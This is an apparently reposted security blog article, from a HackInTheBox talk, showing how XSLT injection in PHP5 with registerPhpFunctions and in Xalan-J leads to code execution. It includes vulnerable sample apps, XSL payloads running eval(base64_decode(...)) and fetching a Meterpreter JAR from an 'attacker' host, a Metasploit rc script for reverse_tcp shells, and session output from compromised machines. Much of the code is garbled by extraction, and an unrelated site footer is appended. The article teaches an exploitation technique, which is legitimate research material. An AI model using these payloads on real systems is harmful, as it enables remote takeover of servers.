This article will describe how to execute high-level code during
the processing of a XSL transform, with the goal of obtaining some
Meterpreter shells. It applies to any XSLT engine capable of
executing high-level code, even if the published code focus on PHP5
(in a non default configuration) and Xalan-J.
Two minimalist applications processing arbitrary XML documents
and XSLT stylesheets are used as the targets. Functionally, these
applications are minimalist online readers for ATOM feeds. They
were used during my HackInTheBox and HackInParis talks and are now
publically available.
The PHP code:
1 n"; 5 echo "ATOM reader (PHP + XSLT) n"; 6 echo "n"; 7 echo "n"; 8 echo "This ATOM reader is coded in PHP5+XSLT, using libxslt.
n"; 9 10 // Get parameters 11 $url = $_GET['url']; 12 $xsl = $_GET['xsl']; 13 14 // Load ATOM file 15 $xmldoc = new DOMDocument(); 16 $xmldoc->load( $url ); 17 18 // Load XSLT file 19 $xsldoc = new DOMDocument(); 20 $xsldoc->load( $xsl ); 21 22 // Register PHP functions as XSLT extensions 23 $xslt = new XSLTProcessor(); 24 $xslt->registerPhpFunctions(); 25 26 // Import the stylesheet 27 $xslt->importStylesheet( $xsldoc ); 28 29 // Transform and print 30 print $xslt->transformToXML( $xmldoc ); 31 32 ?>
You may notice on line 24 a call to XSLTProcessor::registerPhpFunctions(). This is
the non default setting that we will exploit. From the
documentation: "PHP 5 >= 5.0.4 / Enables the ability to use
PHP functions as XSLT functions".
The Java code:
1 2 3 4 "); 8 9 // Get the parameters 10 String xmlFile = request.getParameter("url"); 11 String xslFile = request.getParameter("xsl"); 12 13 // Create a XSLT transformer 14 TransformerFactory tFactory = TransformerFactory.newInstance(); 15 16 // Configure the XSLT stylesheet 17 Transformer transformer = tFactory.newTransformer(new StreamSource(xslFile)); 18 19 // Transform the XML file 20 transformer.transform(new StreamSource(xmlFile), new StreamResult(out)); 21 %>
In both applications, the "xml" parameter contains the URL of a
ATOM feed (for example http://www.us-cert.gov/channels/current.atom). The
"xsl" parameter contains the URL of the XSL style sheet we want to
apply to the XML document.
The following one displays some basic information about the feed
and its entries:
14 5 6 7 8
9 10 11 12 13
Entry #14 [ ] : 15 16
17
18Here's a screenshot of the output (using the US-CERT feed):
OK, everything is now in order. Let's try to execute some more
interesting XSLT code, for example in order to identify the
underlying XSLT engine:12 3 4 Detecting the underlying XSLT engine ...
5 Version:
6 Vendor:
7 Vendor URL:
8 9The output under PHP5:
The output under Tomcat+Xalan-J:
Now, some basic high-level code displaying the current date. For
this, we need to use the right namespace. For PHP, it's
"http://php.net/xsl" and for Xalan-J, it's
"http://xml.apache.org/xalan/java/java.*".In PHP:
12 3 Current date: 4 5 In Java:
12 3 4 Current date: 5 6 In order to execute arbitrary PHP code, we can try to use
eval(), include() or require(). But they aren't PHP functions but constructs. Luckily, both preg_replace() and assert() are
PHP functions and can be used to execute arbitrary PHP code. We now
have everything needed to execute a PHP Meterpreter12 3 4 eval(base64_decode('Base64-encoded Meterpreter code')) 5 67 8 We are done regarding PHP!
We'll now look to Java, where it is much more complex to go from
printing the current date to executing arbitrary classes. In fact,
we'll need to use reflection in order to access enough interesting
Java features to download a remote Meterpreter JAR file. There's
three ways to use reflection. 1) Create your own Java code
accessing the key Java features (and keep this code portable across
versions). That's too hard for me! 2) Use Javapayload to dynamically construct the Java code.
The problem is that Metasploit doesn't include a very recent
version of Javapayload. But that's fine if you're doing everything
by hand 3) Use a well tested and static Java template having all
the needed features and re-use it.In the current scenario, we'll take the third option (thanks @mihi42) in order to integrate nicely with Metasploit.
The result XSL style sheet is complex, but works perfectly:13 http://attacker/eviljava/wkaLrNQj.jar 4rO0ABXVyAA9bTGphdmEubmV0LlVSTDtSUf0kxRtozQIAAHhwAAAAAXB1cgATW0xqYXZhLmxhbmcuU3RyaW5nO63SVufpHXtHAgAAeHAAAAAAriable> 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 Test Complete! 35 36If we put all this logic in a dedicated Metasploit module, we
end up with "generic_xslt_payloads.rb". This module is not
available in trunk for the moment but you can download it from ticket #6784. Copy it to
"modules/exploits/multi/misc/" and configure it using the following
rc script:# Load the module use exploit/multi/misc/generic_xslt_payloads # Configure and start the PHP version set TARGET 0 set URIPATH evilphp.xsl set PAYLOAD php/meterpreter/reverse_tcp set SRVHOST 192.168.2.218 set SRVPORT 5001 set LHOST 192.168.2.218 set LPORT 4001 exploit -j # Configure and start the Java version set TARGET 1 set URIPATH eviljava set PAYLOAD java/meterpreter/reverse_tcp set SRVHOST 192.168.2.218 set SRVPORT 5002 set LHOST 192.168.2.218 set LPORT 4002 exploit -jYou should get two jobs running:
msf exploit(generic_xslt_payloads) > jobs -l -v Jobs ==== Id Name Payload LPORT URIPATH Start Time -- ---- ------- ----- ------- ---------- 0 Exploit: multi/misc/generic_xslt_payloads php/meterpreter/reverse_tcp 4001 /evilphp.xsl Mon Jul 02 18:45:39 +0200 2012 1 Exploit: multi/misc/generic_xslt_payloads java/meterpreter/reverse_tcp 4002 /eviljava Mon Jul 02 18:45:39 +0200 2012Then provide the link to the corresponding XSLT code to the
vulnerable applications, and voilà !msf exploit(generic_xslt_payloads) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java SYSTEM @ box08 192.168.2.218:4002 -> 192.168.2.108:1707 (192.168.2.108) 2 meterpreter php/php www-data (33) @ box13 192.168.2.218:4001 -> 192.168.2.113:43398 (192.168.2.113)0wn3d !
It should be noted that 1) porting the Java version from Xalan-J
to Saxon should be trivial 2) some client-side softwares like
XMLSpy allow to execute Java code from XSLT. The Metasploit module
was demonstrated during the HackInTheBox conference in Amsterdam,
and the video is available on Youtube (this demo starts at minute 48).
文章来源于lcx.cc:From XSLT code execution to Meterpreter shells相关推荐: 今天是感恩节,感谢各位朋友一直以来的关注与支持……
佛说: 以平常之心,接受已发生的事。 以宽阔之心,包容对不起你的人。 以不变之心,坚持正确的理念。 以喜悦之心,帮助须帮助的人。 以放下之心,面对难割舍的事。 以美好之心,欣赏周遭的事物。 以真诚之心,对待每一个人。 以感恩之心,感激拥有的一切。 核总说: 去…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论